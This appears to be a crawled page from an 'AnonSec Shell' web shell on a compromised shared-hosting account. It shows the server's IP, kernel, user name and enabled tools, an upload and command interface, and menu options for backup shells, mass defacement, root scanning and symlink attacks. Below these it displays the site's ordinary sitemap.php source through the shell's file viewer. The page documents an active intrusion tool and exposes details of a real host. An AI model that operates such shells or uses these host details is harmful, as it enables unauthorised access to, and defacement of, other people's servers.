AnonSec Shell
Server IP : 198.54.125.146  /  Your IP : 18.226.150.130   [ Reverse IP ]
Web Server : LiteSpeed
System : Linux business38.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : engixevu ( 716)
PHP Version : 8.1.31
Disable Function : NONE
Domains : 1 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/engixevu/simownerinfo.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/engixevu//simownerinfo.com/sitemap.php
<?php
header('Content-type: application/xml');
echo '<?xml version="1.0" encoding="UTF-8"?>
<urlset  xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">';
require_once("app/init.php");
$game_query = "select * from zon_games order by id desc limit 2000";
$blog_query = "select * from zon_blog order by id desc limit 2000";
$pages_query = "select * from zon_pages order by id desc limit 2000";
$run = mysqli_query($con, $game_query);
$bsql = mysqli_query($con, $blog_query);
$pages_sql = mysqli_query($con, $pages_query);
// while ($row = mysqli_fetch_assoc($run)) { 
?>
<?php 
while ($row = mysqli_fetch_assoc($bsql)) { 
?>
<url>
<loc><?= $site_url . 'blog/' . makeSlug($row['blog_title']) . '/' . $row['id'] ?></loc>
<lastmod><?php echo date('Y-m-d'); ?></lastmod>
<changefreq>daily</changefreq>
<priority>1.0</priority>
</url>
<?php } ?>

<?php while ($row = mysqli_fetch_assoc($run)) {  ?>
<url>
<loc><?= $site_url . 'game/' . makeSlug($row['game_name']) . '/' . $row['id'] ?></loc>
<lastmod><?php echo date('Y-m-d'); ?></lastmod>
<changefreq>daily</changefreq>
<priority>1.0</priority>
</url>
<?php } ?>
<?php while ($row = mysqli_fetch_assoc($pages_sql)) {  ?>
<url>
<loc><?= $site_url . 'page/' . $row['id'] . '/' . makeSlug($row['title']) ?></loc>
<lastmod><?php echo date('Y-m-d'); ?></lastmod>
<changefreq>daily</changefreq>
<priority>1.0</priority>
</url>
<?php } ?>
<?php  echo '</urlset>'; ?>

Anon7 - 2022
AnonSec Team